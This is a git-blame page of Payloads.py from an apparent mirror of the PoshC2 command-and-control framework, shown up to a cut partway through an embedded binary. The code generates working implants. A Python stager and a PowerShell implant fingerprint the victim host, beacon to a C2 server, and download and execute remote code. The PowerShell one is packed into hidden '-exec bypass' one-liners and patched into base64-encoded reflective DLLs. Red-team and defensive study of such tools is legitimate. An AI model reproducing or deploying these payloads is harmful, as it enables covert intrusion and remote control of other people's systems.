infosecn1nja
/
PoshC2_Python
mirror of https://github.com/infosecn1nja/PoshC2_Python.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
PoshC2_Python/Payloads.py

520 lines
1.1 MiB
Python
Raw Normal View History

Initial Commit
2018-07-23 08:55:15 +00:00
#!/usr/bin/env python
from Core import *
from Config import *
from Colours import *
'Updated Python Implant to Work with createnewpayload'
2018-09-23 07:49:00 +00:00
import StringIO, gzip, io, base64, subprocess, os, hashlib, re
Initial Commit
2018-07-23 08:55:15 +00:00
class Payloads(object):
quickstart = None
def __init__(self, KillDate, Key, HostnameIP, Domainfrontheader, Serverport, Proxyuser, Proxypass, Proxyurl, ImplantType, Proxy,
Insecure, UserAgent, Referer, ConnectURL, BaseDirectory):
self.KillDate = KillDate
self.Key = Key
self.DomainFrontHeader = Domainfrontheader
self.HostnameIP = HostnameIP
self.Serverport = Serverport
self.Proxyuser = Proxyuser
self.Proxypass = Proxypass
self.Proxyurl = Proxyurl
self.Proxy = Proxy
self.ImplantType = ImplantType
self.Insecure = Insecure
self.UserAgent = UserAgent
self.Referer = Referer
self.ConnectURL = ConnectURL
self.BaseDirectory = BaseDirectory
'Updated Python Implant to Work with createnewpayload'
2018-09-23 07:49:00 +00:00
if os.path.exists("%saes.py" % PayloadsDirectory):
with open("%saes.py" % PayloadsDirectory, 'rb') as f:
content = f.read()
import re
m = re.search('#KEY(.+?)#KEY', content);
if m: keyfound = m.group(1)
self.PythonHash = hashlib.sha512(content).hexdigest()
self.PythonKey = keyfound
else:
self.PythonKey = gen_key()
randomkey = self.PythonKey
with open("%saes.py" % FilesDirectory, 'rb') as f:
content = f.read()
aespy = content.replace("#REPLACEKEY#","#KEY%s#KEY" % randomkey)
filename = "%saes.py" % (self.BaseDirectory)
output_file = open(filename, 'w')
output_file.write(aespy)
output_file.close()
self.PythonHash = hashlib.sha512(aespy).hexdigest()
'Added KillDate to Python Implant'
2018-09-04 20:54:03 +00:00
self.Python = """import urllib2,os,sys,base64,ssl,socket,pwd,hashlib,time
kd=time.strptime("%s","%%d/%%m/%%Y")
'Added Hash Verification on Python Downloader'
2018-09-04 12:59:50 +00:00
pyhash="%s"
'Added Domain Fronting for OSx Implant'
2018-08-14 20:17:54 +00:00
pykey="%s"
key="%s"
'Updated Python Implant to Work with createnewpayload'
2018-09-23 07:49:00 +00:00
serverclean="%s"
'Added Domain Fronting for OSx Implant'
2018-08-14 20:17:54 +00:00
url="%s"
url2="%s"
hh="%s"
ua="%s"
'Added KillDate to Python Implant'
2018-09-04 20:54:03 +00:00
cstr=time.strftime("%%d/%%m/%%Y",time.gmtime());cstr=time.strptime(cstr,"%%d/%%m/%%Y")
'Added Domain Fronting for OSx Implant'
2018-08-14 20:17:54 +00:00
ssl._create_default_https_context=ssl._create_unverified_context
if hh: r=urllib2.Request(url,headers={'Host':hh,'User-agent':ua})
else: r=urllib2.Request(url,headers={'User-agent':ua})
'Python Downloader'
2018-08-15 12:33:30 +00:00
res=urllib2.urlopen(r);d=res.read();c=d[1:];b=c.decode("hex")
'Added Hash Verification on Python Downloader'
2018-09-04 12:59:50 +00:00
s=hashlib.sha512(b)
'Added KillDate to Python Implant'
2018-09-04 20:54:03 +00:00
if pykey in b and pyhash == s.hexdigest() and cstr < kd: exec(b)
'Added Domain Fronting for OSx Implant'
2018-08-14 20:17:54 +00:00
else: sys.exit(0)
un=pwd.getpwuid( os.getuid() )[ 0 ];pid=os.getpid()
is64=sys.maxsize > 2**32;arch=('x64' if is64 == True else 'x86')
hn=socket.gethostname();o=urllib2.build_opener()
'Updated Implant Naming Convention v4.3'
2018-10-18 19:06:48 +00:00
encsid=encrypt(key, '%%s;%%s;%%s;%%s;%%s;%%s' %% (un,hn,hn,arch,pid,serverclean))
'Added Domain Fronting for OSx Implant'
2018-08-14 20:17:54 +00:00
if hh:r=urllib2.Request(url2,headers={'Host':hh,'User-agent':ua,'Cookie':'SessionID=%%s' %% encsid})
else:r=urllib2.Request(url2,headers={'User-agent':ua,'Cookie':'SessionID=%%s' %% encsid})
res=urllib2.urlopen(r);html=res.read();x=decrypt(key, html).rstrip('\\0');exec(x)
'Removed Serverclean'
2018-09-23 07:54:41 +00:00
""" % (self.KillDate,self.PythonHash,self.PythonKey,self.Key,(self.HostnameIP+":"+self.Serverport),(self.HostnameIP+":"+self.Serverport+"/"+QuickCommand+"_py"),(self.HostnameIP+":"+self.Serverport+self.ConnectURL+"?m"),self.DomainFrontHeader,self.UserAgent)
Initial Commit
2018-07-23 08:55:15 +00:00
self.C2Core = """%s
$sc="%s"
$s="%s"
function CAM ($key,$IV){
Updated to work with FIPSAlgorithmPolicy
2018-12-02 00:57:25 +00:00
try {$a = New-Object "System.Security.Cryptography.RijndaelManaged"
} catch {$a = New-Object "System.Security.Cryptography.AesCryptoServiceProvider"}
Initial Commit
2018-07-23 08:55:15 +00:00
$a.Mode = [System.Security.Cryptography.CipherMode]::CBC
$a.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
$a.BlockSize = 128
$a.KeySize = 256
if ($IV)
{
if ($IV.getType().Name -eq "String")
{$a.IV = [System.Convert]::FromBase64String($IV)}
else
{$a.IV = $IV}
}
if ($key)
{
if ($key.getType().Name -eq "String")
{$a.Key = [System.Convert]::FromBase64String($key)}
else
{$a.Key = $key}
}
$a}
function ENC ($key,$un){
$b = [System.Text.Encoding]::UTF8.GetBytes($un)
$a = CAM $key
$e = $a.CreateEncryptor()
$f = $e.TransformFinalBlock($b, 0, $b.Length)
[byte[]] $p = $a.IV + $f
[System.Convert]::ToBase64String($p)
}
function DEC ($key,$enc){
$b = [System.Convert]::FromBase64String($enc)
$IV = $b[0..15]
$a = CAM $key $IV
$d = $a.CreateDecryptor()
$u = $d.TransformFinalBlock($b, 16, $b.Length - 16)
[System.Text.Encoding]::UTF8.GetString($u)}
function Get-Webclient ($Cookie) {
$d = (Get-Date -Format "dd/MM/yyyy");
$d = [datetime]::ParseExact($d,"dd/MM/yyyy",$null);
$k = [datetime]::ParseExact("%s","dd/MM/yyyy",$null);
if ($k -lt $d) {exit}
$username = "%s"
$password = "%s"
$proxyurl = "%s"
$wc = New-Object System.Net.WebClient;
%s
$h="%s"
if ($h -and (($psversiontable.CLRVersion.Major -gt 2))) {$wc.Headers.Add("Host",$h)}
elseif($h){$script:s="https://$($h)%s";$script:sc="https://$($h)"}
$wc.Headers.Add("User-Agent","%s")
$wc.Headers.Add("Referer","%s")
if ($proxyurl) {
$wp = New-Object System.Net.WebProxy($proxyurl,$true);
if ($username -and $password) {
$PSS = ConvertTo-SecureString $password -AsPlainText -Force;
$getcreds = new-object system.management.automation.PSCredential $username,$PSS;
$wp.Credentials = $getcreds;
} else { $wc.UseDefaultCredentials = $true; }
$wc.Proxy = $wp; } else {
$wc.UseDefaultCredentials = $true;
$wc.Proxy.Credentials = $wc.Credentials;
} if ($cookie) { $wc.Headers.Add([System.Net.HttpRequestHeader]::Cookie, "SessionID=$Cookie") }
$wc }
function primer {
Updated to include new User Idenfication for Primary Token Use
2018-10-18 09:56:45 +00:00
try{$u=([Security.Principal.WindowsIdentity]::GetCurrent()).name} catch{if ($env:username -eq "$($env:computername)$"){}else{$u=$env:username}}
'Updated Implant Naming Convention v4.3'
2018-10-18 19:06:48 +00:00
$o="$env:userdomain;$u;$env:computername;$env:PROCESSOR_ARCHITECTURE;$pid;%s"
Updated to work with FIPSAlgorithmPolicy
2018-12-02 00:57:25 +00:00
try {$pp=enc -key %s -un $o} catch {$pp="ERROR"}
Initial Commit
2018-07-23 08:55:15 +00:00
$primer = (Get-Webclient -Cookie $pp).downloadstring($s)
$p = dec -key %s -enc $primer
if ($p -like "*key*") {$p| iex}
}
try {primer} catch {}
Start-Sleep 300
try {primer} catch {}
Start-Sleep 600
try {primer} catch {}""" % (self.Insecure,(self.HostnameIP+":"+self.Serverport),
(self.HostnameIP+":"+self.Serverport+self.ConnectURL+self.ImplantType),self.KillDate, self.Proxyuser,self.Proxypass,
self.Proxyurl,self.Proxy,self.DomainFrontHeader,self.ConnectURL,self.UserAgent,self.Referer,
(self.HostnameIP+":"+self.Serverport),self.Key,self.Key)
def QuickstartLog( self, txt ):
if not self.quickstart: self.quickstart = ''
print txt
self.quickstart += txt + '\n'
def WriteQuickstart( self, path ):
with open( path, 'w' ) as f:
f.write( self.quickstart + Colours.END )
print ''
print 'Quickstart written to ' + path
def CreateRawBase(self, full=False):
out = StringIO.StringIO()
with gzip.GzipFile(fileobj=out, mode="w") as f:
f.write((self.C2Core))
gzipdata = base64.b64encode(out.getvalue())
b64gzip = "IEX(New-Object IO.StreamReader((New-Object System.IO.Compression.GzipStream([IO.MemoryStream][Convert]::FromBase64String('%s'),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()" % gzipdata
batfile = "powershell -exec bypass -Noninteractive -windowstyle hidden -e " + base64.b64encode(b64gzip.encode('UTF-16LE'))
if full:
return batfile
else:
return base64.b64encode(b64gzip.encode('UTF-16LE'))
def CreateRaw(self, name=""):
out = StringIO.StringIO()
with gzip.GzipFile(fileobj=out, mode="w") as f:
f.write((self.C2Core))
gzipdata = base64.b64encode(out.getvalue())
b64gzip = "IEX(New-Object IO.StreamReader((New-Object System.IO.Compression.GzipStream([IO.MemoryStream][Convert]::FromBase64String('%s'),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()" % gzipdata
filename = "%s%spayload.txt" % (self.BaseDirectory,name)
output_file = open(filename, 'w')
output_file.write(self.C2Core )
output_file.close()
self.QuickstartLog( "Raw Payload written to: %s" % filename )
batfile = "powershell -exec bypass -Noninteractive -windowstyle hidden -e " + base64.b64encode(b64gzip.encode('UTF-16LE'))
filename = "%s%spayload.bat" % (self.BaseDirectory,name)
output_file = open(filename, 'w')
output_file.write(batfile)
output_file.close()
self.QuickstartLog( "Batch Payload written to: %s" % filename )
def PatchDll(self, filename, dll, offset, name):
filename = "%s%s" % (self.BaseDirectory,filename)
output_file = open(filename, 'wb')
output_file.write(base64.b64decode(dll))
output_file.close()
out = StringIO.StringIO()
with gzip.GzipFile(fileobj=out, mode="w") as f:
f.write((self.C2Core))
gzipdata = base64.b64encode(out.getvalue())
b64gzip = "sal a New-Object;iex(a IO.StreamReader((a System.IO.Compression.GzipStream([IO.MemoryStream][Convert]::FromBase64String(\"%s\"),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()" % gzipdata
patchlen = 16000 - len((base64.b64encode(b64gzip.encode('UTF-16LE'))).encode('UTF-16LE'))
patch = (base64.b64encode(b64gzip.encode('UTF-16LE'))).encode('UTF-16LE')
patch2 = ""
patch2 = patch2.ljust( patchlen, '\x00' )
patch3 = "%s%s" % (patch,patch2)
f = open(filename, "r+b")
f.seek(offset)
f.write(patch3)
f.close()
self.QuickstartLog( "%s Payload written to: %s" % (name, filename) )
def CreateDlls(self, name=""):
# Load CLR "v2.0.50727"
self.QuickstartLog( "" + Colours.END )
self.QuickstartLog( "ReflectiveDLL that loads CLR v2.0.50727 - DLL Export (VoidFunc2)" + Colours.GREEN )
Updated Shellcode/DLL to support scriptblock / transcript bypass
2018-11-13 21:22:43 +00:00
v2_86 = "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
self.PatchDll("%sPosh_v2_x86.dll" % name, v2_86, 0x00012D80, "DLL")
v2_64 = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAADqHxAVrn5+Rq5+fkaufn5GGuKPRqp+fkYa4o1G2H5+RhrijEajfn5GfBp9R6d+fkZ8GnpHv35+Rnwae0eNfn5GpwbtRql+fkaufn9Gx35+RkUad0esfn5GRRp+R69+fkZFGoFGr35+RkUafEevfn5GUmljaK5+fkYAAAAAAAAAAAAAAAAAAAAAUEUAAGSGBgA0KutbAAAAAAAAAADwACIgCwIODACuAAAAHAEAAAAAAPAdAAAAEAAAAAAAgAEAAAAAEAAAAAIAAAUAAgAAAAAABQACAAAAAAAAAAIAAAQAAAAAAAACAGABAAAQAAAAAAAAEAAAAAAAAAAAEAAAAAAAABAAAAAAAAAAAAAAEAAAALBHAQBQAAAAAEgBAFAAAAAA4AEA4AEAAADQAQB8DgAAAAAAAAAAAAAA8AEAPAYAAJAzAQBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQBAAABAAAAAAAAAAAAAADAAACgAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAABurQAAABAAAACuAAAABAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAAOJAAAADAAAAAkgAAALIAAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAAPhvAAAAYAEAAGAAAABEAQAAAAAAAAAAAAAAAABAAADALnBkYXRhAAB8DgAAANABAAAQAAAApAEAAAAAAAAAAAAAAAAAQAAAQC5yc3JjAAAA4AEAAADgAQAAAgAAALQBAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAADwGAAAA8AEAAAgAAAC2AQAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEiNDVmtAADpBBIAAMzMzMxAU0iB7DABAACD+gF1TTPJ/xXyrwAAM9JIjUwkIEG4BAEAAEiL2OjFHQAAQbgEAQAASI1UJCBIi8v/FbGvAABIjRWKIgEASI1MJCD/FS+yAABIhcB1BehtAAAAuAEAAABIgcQwAQAAW8PMzMxIiVwkCFdIg+wwSIsJSI0VYCIBAEmL+P8Vd68AADPbSIXAdCtMjQ2xIgEASIl8JCBMjQXFIgEASI0VTiIBAEiNDW8iAQD/0IXAjUsBD0nZi8NIi1wkQEiDxDBfw0BVU1ZXQVRBVkFXSIvsSIPsUEUz/0yJfVBMiX1ITIl9WEWNZxhBi8zoawkAAEiL+EiFwHQcSI0N/CEBAEyJeAjHQBABAAAA6LwFAABIiQfrA0mL/0iF/w+EVgMAAEmLzEyJfdjoLwkAAEiL2EiFwHQcSI0NwCEBAEyJeAjHQBABAAAA6IAFAABIiQPrA0mL30iF2w+EJQMAAEiNDaAhAQBMiX3Q/xWGrgAATI1FUEiJReBIjU3g6On+//9MOX3gD4TiAQAASItNUEiLAf9QUIXAD4jQAQAASItNSEiFyXQGSIsB/1AQSItNUEiNVUhMiX1ISIsB/1BohcAPiKcBAAD/FUKuAACLyOjfLQAASYv3TI012b0BAOikLQAARIvAuB+F61FB9+jB+gOLysHpHwPRa8oZRCvBZkGDwEFmRokENkiDxgJIg/4ecsxIi01ISIXJdAZIiwH/UBBIi01QTI1NSEyJfUhFM8BJi9ZIiwH/UGCFwHkpSItNSEiFyXQGSIsB/1AQSItNUEiNVUhMiX1ISIsB/1BohcAPiAgBAABIi3VISIX2D4QdAgAASItNWEiFyXQGSIsB/1AQTIl9WEyNRVhIiwZIjRXDIAEASIvO/xCFwA+IzQAAALkRAAAATI1F6L4AFgAASIl16I1R8P8Vm68AAEiLyEyL8P8Vp68AAEmLThBIjRWclAEARIvG6IQnAABJi87/FVOvAABIi3VYSIX2D4SqAQAASItN2EiFyXQGSIsB/1AQTIl92EyNRdhIiwZJi9ZIi87/kGgBAACFwHhTSIt12EiF9g+EfgEAAEiLTdBIhcl0BkiLAf9QEEyJfdBMjUXQSIsGSIvOSIsT/5CIAAAAhcB4HEiLTdBIiU3wSIXJdAZIiwH/UAhIjU3w6FEBAABIi01YSIXJdApMiX1YSIsB/1AQSItNSEiFyQ+EIwEAAEiLAf9QEEiLTUhIhcl0CkyJfUhIiwH/UBBIi01QSIXJdApIiwH/UBBMiX1QSItN0EiFyXQGSIsB/1AQg87/i8bwD8FDEAPGdS5IiwtIhcl0Cf8VWq4AAEyJO0iLSwhIhcl0CehhBgAATIl7CEmL1EiLy+hSBgAASItN2EiFyXQGSIsB/1AQi8bwD8FHEAPGdS5Iiw9Ihcl0Cf8VEq4AAEyJP0iLTwhIhcl0CegZBgAATIl/CEmL1EiLz+gKBgAASItNWEiFyXQGSIsB/1AQSItNSEiFyXQGSIsB/1AQSIPEUEFfQV5BXF9eW13DuQ4AB4DoGwIAAMy5DgAHgOgQAgAAzLkDQACA6AUCAADMuQNAAIDo+gEAAMy5A0AAgOjvAQAAzLkDQACA6OQBAADMzMzMSIvESIlYCEiJcCBMiUAYVVdBV0iNaKFIgeywAAAASIv5Qb8YAAAAQYvP6HEFAABBjXfpSIvYSIXAdCNIg2AIAEiNDTEeAQCJcBD/FTitAABIiQNIhcAPhEgBAADrAjPbSIXbD4RGAQAAuAgAAABIjQ27UwEAZolF7/8VCa0AAEiJRfdIhcAPhC4BAABIjU0H/xXarAAASI1N1/8V0KwAALkMAAAARIvGM9L/FfCsAACDZXcATI1F70iLyEiNVXdIi/D/FcisAACFwHhXDxBF10iLD/IPEE3nDylFJ/IPEU03SIXJD4TbAAAASIsBSI1VB0iJVCQwRTPJSI1VJ0iJdCQoSIlUJCBBuBgBAABIixP/kMgBAACFwHgJSIvO/xVFrAAASI1N1/8Ve6wAAEiNTQf/FXGsAABIjU3v/xVnrAAAg8j/8A/BQxCD+AF1MEiLC0iFyXQK/xUkrAAASIMjAEiLSwhIhcl0CugqBAAASINjCABJi9dIi8voGgQAAEiLD0iFyXQGSIsB/1AQTI2cJLAAAABJi1sgSYtzOEmL40FfX13DuQ4AB4DoMgAAAMy5DgAHgOgnAAAAzLkOAAeA6BwAAADMuQNAAIDoEQAAAMzpM/r//8zMzMzMzMzMzMzMSIlcJAhXSIPsIEiLHT9JAQCL+UiLy+hlBwAAM9KLz0iLw0iLXCQwSIPEIF9I/+DMSIlMJAhVV0FWSIPsUEiNbCQwSIldSEiJdVBIiwUvSQEASDPFSIlFEEiL8UiFyXUHM8DpGwEAAEiDy/8PH0QAAEj/w4A8GQB190j/w0iB+////38PhxYBAACJXQQzwIlEJChIiUQkIESLy0yLwTPSM8n/FSmpAABMY/BEiXUAhcB1E/8VEKkAAIXAD4/qAAAA6e0AAABJi85IA8lBgf4AEAAAfSZIjUEPSDvBdwpIuPD///////8PSIPg8OggCwAASCvgSI18JDDrCOg1KAAASIv4SIl9COsRM/9IiX0ISIt1QESLdQCLXQRIhf8PhJgAAABEiXQkKEiJfCQgRIvLTIvGM9Izyf8VlKgAAIXAdR1Bgf4AEA
self.PatchDll("%sPosh_v2_x64.dll" % name, v2_64, 0x00014D00, "DLL")
Initial Commit
2018-07-23 08:55:15 +00:00
# Load CLR "v4.0.30319"
self.QuickstartLog( "" + Colours.END )
self.QuickstartLog( "ReflectiveDLL that loads CLR v4.0.30319 - DLL Export (VoidFunc)" + Colours.GREEN )
Updated Shellcode/DLL to support scriptblock / transcript bypass
2018-11-13 21:22:43 +00:00
v4_86 = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAADAcg76hBNgqYQTYKmEE2CpMI+RqY0TYKkwj5Op8hNgqTCPkqmcE2CpVndjqJYTYKlWd2SolBNgqVZ3ZaigE2CpjWvzqYMTYKmEE2Gp4xNgqW93aaiGE2Cpb3dgqIUTYKlvd5+phRNgqW93YqiFE2CpUmljaIQTYKkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQRQAATAEFAJb06lsAAAAAAAAAAOAAAiELAQ4MAMQAAADcAAAAAAAAxh4AAAAQAAAA4AAAAAAAEAAQAAAAAgAABQABAAAAAAAFAAEAAAAAAADQAQAABAAAAAAAAAIAQAEAABAAABAAAAAAEAAAEAAAAAAAABAAAAAgOAEAUAAAAHA4AQBQAAAAALABAOABAAAAAAAAAAAAAAAAAAAAAAAAAMABAJwPAACgKwEAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAsAQBAAAAAAAAAAAAAAAAA4AAATAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAADMIAAAAQAAAAxAAAAAQAAAAAAAAAAAAAAAAAACAAAGAucmRhdGEAADRfAAAA4AAAAGAAAADIAAAAAAAAAAAAAAAAAABAAABALmRhdGEAAADgaAAAAEABAABgAAAAKAEAAAAAAAAAAAAAAAAAQAAAwC5yc3JjAAAA4AEAAACwAQAAAgAAAIgBAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAJwPAAAAwAEAABAAAACKAQAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA